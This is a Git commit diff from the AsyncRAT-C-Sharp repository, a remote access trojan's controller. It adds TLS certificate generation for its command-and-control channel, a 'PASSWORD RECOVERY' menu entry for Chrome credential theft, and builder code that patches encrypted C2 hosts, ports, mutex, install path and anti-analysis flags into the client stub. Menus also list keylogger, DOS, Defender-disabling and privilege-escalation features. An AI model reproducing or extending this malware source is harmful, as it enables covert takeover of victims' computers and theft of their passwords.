Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
Added secure socket
Added chrome password recovery
This commit is contained in:
NYAN CAT 2019-05-11 08:05:18 -07:00
parent d0db7be786
commit db90ddf043
37 changed files with 1940 additions and 217 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
AsyncRAT-C#/AsyncRAT-Sharp/App.config
View File

@ -11,22 +11,19 @@
<userSettings>
<AsyncRAT_Sharp.Properties.Settings>
<setting name="Ports" serializeAs="String">
<value/>
</setting>
<setting name="Password" serializeAs="String">
<value/>
<value />
</setting>
<setting name="DNS" serializeAs="String">
<value/>
<value />
</setting>
<setting name="Filename" serializeAs="String">
<value/>
<value />
</setting>
<setting name="Notification" serializeAs="String">
<value>False</value>
</setting>
<setting name="Mutex" serializeAs="String">
<value/>
<value />
</setting>
</AsyncRAT_Sharp.Properties.Settings>
</userSettings>

16
AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
View File

@ -43,6 +43,9 @@
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<ItemGroup>
<Reference Include="BouncyCastle.Crypto, Version=1.8.5.0, Culture=neutral, PublicKeyToken=0e99375e54769942">
<HintPath>..\packages\BouncyCastle.1.8.5\lib\BouncyCastle.Crypto.dll</HintPath>
</Reference>
<Reference Include="cGeoIp, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
<SpecificVersion>False</SpecificVersion>
<HintPath>Resources\cGeoIp.dll</HintPath>
@ -53,6 +56,8 @@
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.IO.Compression" />
<Reference Include="System.IO.Compression.FileSystem" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
@ -65,6 +70,7 @@
</ItemGroup>
<ItemGroup>
<Compile Include="Cryptography\Aes256.cs" />
<Compile Include="Cryptography\Sha256.cs" />
<Compile Include="Forms\FormAbout.cs">
<SubType>Form</SubType>
</Compile>
@ -77,6 +83,12 @@
<Compile Include="Forms\FormBuilder.Designer.cs">
<DependentUpon>FormBuilder.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FormCertificate.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormCertificate.Designer.cs">
<DependentUpon>FormCertificate.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FormDOS.cs">
<SubType>Form</SubType>
</Compile>
@ -170,6 +182,9 @@
<EmbeddedResource Include="Forms\FormBuilder.resx">
<DependentUpon>FormBuilder.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormCertificate.resx">
<DependentUpon>FormCertificate.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormDOS.resx">
<DependentUpon>FormDOS.cs</DependentUpon>
</EmbeddedResource>
@ -219,6 +234,7 @@
</ItemGroup>
<ItemGroup>
<Content Include="async_icon.ico" />
<None Include="Resources\key.png" />
<None Include="Resources\uac.png" />
<None Include="Resources\disabled.png" />
<None Include="Resources\AsyncRAT-Sharp.exe.config" />

33
AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs Normal file
View File

@ -0,0 +1,33 @@
using System.Security.Cryptography;
using System.Text;
namespace AsyncRAT_Sharp.Cryptography
{
public static class Sha256
{
public static string ComputeHash(string input)
{
byte[] data = Encoding.UTF8.GetBytes(input);
using (SHA256Managed sha = new SHA256Managed())
{
data = sha.ComputeHash(data);
}
StringBuilder hash = new StringBuilder();
foreach (byte _byte in data)
hash.Append(_byte.ToString("X2"));
return hash.ToString().ToUpper();
}
public static byte[] ComputeHash(byte[] input)
{
using (SHA256Managed sha = new SHA256Managed())
{
return sha.ComputeHash(input);
}
}
}
}

17
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs generated
View File

@ -64,6 +64,7 @@
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
@ -157,12 +158,12 @@
// lv_prefor
//
this.lv_prefor.Text = "PERFORMANCE";
this.lv_prefor.Width = 170;
this.lv_prefor.Width = 189;
//
// lv_admin
//
this.lv_admin.Text = "PRIVILEGES";
this.lv_admin.Width = 138;
this.lv_admin.Width = 166;
//
// contextMenuStrip1
//
@ -178,6 +179,7 @@
this.kEYLOGGERToolStripMenuItem,
this.toolStripMenuItem1,
this.fILEMANAGERToolStripMenuItem,
this.pASSWORDRECOVERYToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem,
this.dISABLESToolStripMenuItem,
this.bOTKILLERToolStripMenuItem,
@ -188,7 +190,7 @@
this.toolStripSeparator3,
this.aBOUTToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502);
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 568);
//
// cLIENTOPTIONSToolStripMenuItem
//
@ -373,6 +375,14 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
// pASSWORDRECOVERYToolStripMenuItem
//
this.pASSWORDRECOVERYToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.key;
this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(282, 30);
this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
//
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -638,6 +648,7 @@
private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_admin;
private System.Windows.Forms.ToolStripMenuItem pASSWORDRECOVERYToolStripMenuItem;
}
}

42
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

File diff suppressed because one or more lines are too long

38
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
View File

@ -4,6 +4,9 @@ using Mono.Cecil;
using AsyncRAT_Sharp.Helper;
using Mono.Cecil.Cil;
using System.Text;
using System.Security.Cryptography;
using AsyncRAT_Sharp.Cryptography;
using System.Security.Cryptography.X509Certificates;
namespace AsyncRAT_Sharp.Forms
{
@ -92,6 +95,17 @@ namespace AsyncRAT_Sharp.Forms
private void WriteSettings(AssemblyDefinition asmDef)
{
var key = Methods.GetRandomString(32);
var aes = new Aes256(key);
var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable);
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert));
byte[] signature;
using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey)
{
var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key));
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256"));
}
foreach (var typeDef in asmDef.Modules[0].Types)
{
if (typeDef.FullName == "Client.Settings")
@ -106,29 +120,35 @@ namespace AsyncRAT_Sharp.Forms
{
string operand = methodDef.Body.Instructions[i].Operand.ToString();
if (operand == "6606")
methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textPort.Text);
if (operand == "%Ports%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(textPort.Text);
if (operand == "127.0.0.1")
methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textIP.Text);
if (operand == "%Hosts%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(textIP.Text);
if (operand == "false")
if (operand == "%Install%")
methodDef.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
if (operand == "%AppData%")
if (operand == "%Folder%")
methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text;
if (operand == "Payload.exe")
if (operand == "%File%")
methodDef.Body.Instructions[i].Operand = textFilename.Text;
if (operand == "NYAN CAT")
methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(Settings.Password));
if (operand == "%Key%")
methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key));
if (operand == "%MTX%")
methodDef.Body.Instructions[i].Operand = txtMutex.Text;
if (operand == "%Anti%")
methodDef.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower();
if (operand == "%Certificate%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
}
}
}

66
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs generated Normal file
View File

@ -0,0 +1,66 @@
namespace AsyncRAT_Sharp.Forms
{
partial class FormCertificate
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormCertificate));
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.SuspendLayout();
//
// richTextBox1
//
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill;
this.richTextBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 10F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(565, 146);
this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = " \n Certificate is not found.\n Creating a new certificate... Please wait...";
//
// FormCertificate
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(565, 146);
this.Controls.Add(this.richTextBox1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormCertificate";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
this.Text = "Certificate";
this.Load += new System.EventHandler(this.FormCertificate_Load);
this.ResumeLayout(false);
}
#endregion
private System.Windows.Forms.RichTextBox richTextBox1;
}
}

127
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs Normal file
View File

@ -0,0 +1,127 @@
using System;
using System.Threading.Tasks;
using System.Windows.Forms;
using Org.BouncyCastle.Asn1.X509;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Generators;
using Org.BouncyCastle.Crypto.Operators;
using Org.BouncyCastle.Crypto.Parameters;
using Org.BouncyCastle.Crypto.Prng;
using Org.BouncyCastle.Math;
using Org.BouncyCastle.Security;
using Org.BouncyCastle.X509;
using Org.BouncyCastle.X509.Extension;
using System.Security.Cryptography.X509Certificates;
using System.IO;
using System.IO.Compression;
namespace AsyncRAT_Sharp.Forms
{
public partial class FormCertificate : Form
{
public FormCertificate()
{
InitializeComponent();
}
private async void FormCertificate_Load(object sender, EventArgs e)
{
await Task.Run(() =>
{
try
{
string backup = Application.StartupPath + "\\BackupCertificate.zip";
if (File.Exists(backup))
{
MessageBox.Show(this, "Found a zip backup, Extracting (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information);
ZipFile.ExtractToDirectory(backup, Application.StartupPath);
Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath);
return;
}
Settings.ServerCertificate = CreateCertificateAuthority("AsyncRAT Server CA", 4096);
File.WriteAllBytes(Settings.CertificatePath, Settings.ServerCertificate.Export(X509ContentType.Pkcs12));
using (ZipArchive archive = ZipFile.Open(backup, ZipArchiveMode.Create))
{
archive.CreateEntryFromFile(Settings.CertificatePath, Path.GetFileName(Settings.CertificatePath));
}
MessageBox.Show(this, "Created a ZIP backup (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
catch (Exception ex)
{
MessageBox.Show(this, ex.Message, "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Environment.Exit(0);
}
});
this.Close();
}
public static X509Certificate2 CreateCertificate(string certName, X509Certificate2 ca, int keyStrength)
{
var caCert = DotNetUtilities.FromX509Certificate(ca);
var random = new SecureRandom(new CryptoApiRandomGenerator());
var keyPairGen = new RsaKeyPairGenerator();
keyPairGen.Init(new KeyGenerationParameters(random, keyStrength));
AsymmetricCipherKeyPair keyPair = keyPairGen.GenerateKeyPair();
var certificateGenerator = new X509V3CertificateGenerator();
var CN = new X509Name("CN=" + certName);
var SN = BigInteger.ProbablePrime(120, random);
certificateGenerator.SetSerialNumber(SN);
certificateGenerator.SetSubjectDN(CN);
certificateGenerator.SetIssuerDN(caCert.IssuerDN);
certificateGenerator.SetNotAfter(DateTime.MaxValue);
certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(1, 0, 0, 0)));
certificateGenerator.SetPublicKey(keyPair.Public);
certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keyPair.Public));
certificateGenerator.AddExtension(X509Extensions.AuthorityKeyIdentifier, false, new AuthorityKeyIdentifierStructure(caCert.GetPublicKey()));
var caKeyPair = DotNetUtilities.GetKeyPair(ca.PrivateKey);
ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", caKeyPair.Private, random);
var certificate = certificateGenerator.Generate(signatureFactory);
certificate.Verify(caCert.GetPublicKey());
var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate));
certificate2.PrivateKey = DotNetUtilities.ToRSA(keyPair.Private as RsaPrivateCrtKeyParameters);
return certificate2;
}
public static X509Certificate2 CreateCertificateAuthority(string caName, int keyStrength)
{
var random = new SecureRandom(new CryptoApiRandomGenerator());
var keyPairGen = new RsaKeyPairGenerator();
keyPairGen.Init(new KeyGenerationParameters(random, keyStrength));
AsymmetricCipherKeyPair keypair = keyPairGen.GenerateKeyPair();
var certificateGenerator = new X509V3CertificateGenerator();
var CN = new X509Name("CN=" + caName);
var SN = BigInteger.ProbablePrime(120, random);
certificateGenerator.SetSerialNumber(SN);
certificateGenerator.SetSubjectDN(CN);
certificateGenerator.SetIssuerDN(CN);
certificateGenerator.SetNotAfter(DateTime.MaxValue);
certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(2, 0, 0, 0)));
certificateGenerator.SetPublicKey(keypair.Public);
certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keypair.Public));
certificateGenerator.AddExtension(X509Extensions.BasicConstraints, true, new BasicConstraints(true));
ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", keypair.Private, random);
var certificate = certificateGenerator.Generate(signatureFactory);
var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate));
certificate2.PrivateKey = DotNetUtilities.ToRSA(keypair.Private as RsaPrivateCrtKeyParameters);
return certificate2;
}
}
}

577
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx Normal file
View File

@ -0,0 +1,577 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
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
O//Yoln/1JhH/8R0Bv/DcQD5w3EAc8NxAADDcQAA3X0AAN19AADdfQCM3X0A/919AP/wxIz///////rt
2//hjiP/3XwA/919AP/afAD/x3MA/8NxAP/DcAD/yX8a//Tl0f//////58eb/8RzA//DcQD/w3EAoMNx
AAHDcQAA3X0AAN19AALdfQCl3X0A/917AP/kmDb//PTq///////rs2r/3HsA/919AP/afAD/x3IA/8Nx
AP/CbwD/2KRc//79/P/89/H/0pVC/8JvAP/DcQD/w3EAuMNxAAfDcQAA3X0AAN19AAjdfQC83X0A/919
AP/efwX/89Gk///////23r7/4IgV/96CCv/cgQr/yXgK/8V2Cv/HehH/7dOx///////t1LP/xXYK/8Nx
AP/DcQD/w3EAzcNxABHDcQAA3X0AAN19ABPdfQDR3X0A/919AP/dewD/56JJ//769P/++/j/+OPJ//ff
wf/238L/8d3C//Dcwf/y4Mf//fn1//78+v/XoVf/wm8A/8NxAP/DcQD/w3EA38NxAB7DcQAA3X0AAN19
ACHdfQDi3X0A/919AP/dfQD/34MN//bbuv////////////////////////////////////////////Lg
x//HexP/w3AA/8NxAP/DcQD/w3EA7cNxAC/DcQAA3X0AAN19ADPdfQDv3X0A/919AP/dfQD/3XsA/+mt
Xv/+/fv//vv3/+/AhP/oq1z/26Zd/9+1ev/89/H//////92ub//CbwD/w3EA/8NxAP/DcQD/w3EA98Nx
AETDcQAA3X0AAN19AEjdfQD53X0A/919AP/dfQD/3XwA/+CIF//45cz//////+27ev/ZeAD/xW4A/9qp
Z///////9urZ/8qCIP/DcAD/w3EA/8NxAP/DcQD/w3EA/sNxAFvDcQAA3X0AAN19AGDdfQD/3X0A/919
AP/dfQD/3X0A/918AP/tuHX///////nmzv/dhxb/ynkM/+/bvv//////4ryG/8NwAP/DcQD/w3EA/8Nx
AP/DcQD/w3EA/8NxAHTDcQAA3X0AAN19AHndfQD/3X0A/919AP/dfQD/3X0A/918AP/ijyT/+u3d///+
/P/lp1b/15hE//369f/58uf/zosw/8JvAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAI7DcQAA3X0AAN19
AJPdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/8MSM///////z17P/7c6l///////oyZ7/xHME/8Nx
AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAKfDcQAD3X0ABN19AKvdfQD/3X0A/919AP/dfQD/3X0A/919
AP/dewD/5Jc0//z06v/+/Pn//vv3//z48v/TlkP/wm8A/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx
AL3DcQAL3X0ADd19AMHdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3n8F//PQo////////////+3V
tP/Fdgr/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxANHDcQAX3X0AGt19ANXdfQD/3X0A/919
AP/dfQD/3X0A/919AP/dfQD/3XsA/+ahR//++fT//vz6/9iiWf/CbwD/w3EA/8NxAP/DcQD/w3EA/8Nx
AP/DcQD/w3EA/8NxAOLDcQAo3X0AJ919AN3dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/96D
DP/23Lv/8uLL/8d8FP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAOjDcQA33X0ACN19
AEXdfQCU3X0A1919APrdfQD/3X0A/919AP/dfQD/3X0A/917AP/pq1z/3Kxr/8JvAP/DcQD/w3EA/8Nx
AP/DcQD/w3EA/8NxAPvDcQDcw3EAm8NxAE3DcQAMAAAAAN19AADdfQAC3X0AG919AFbdfQCj3X0A4d19
AP3dfQD/3X0A/919AP/cgQv/yXkN/8NwAP/DcQD/w3EA/8NxAP3DcQDlw3EAqsNxAF3DcQAfw3EAA8Nx
AAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AADdfQAE3X0AJN19AGTdfQCw3X0A5919AP3aewD/x3IA/8Nx
AP7DcQDrw3EAtsNxAGzDcQApw3EABcNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA3X0AAN19AADdfQAI3X0ANd19AIXafADZx3MA3sNxAI3DcQA7w3EAC8NxAADDcQAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA/4H/AP4AfwD8AD8A8AAPAMAAAwDAAAMAwAABAIAAAQCAAAEAgAABAIAA
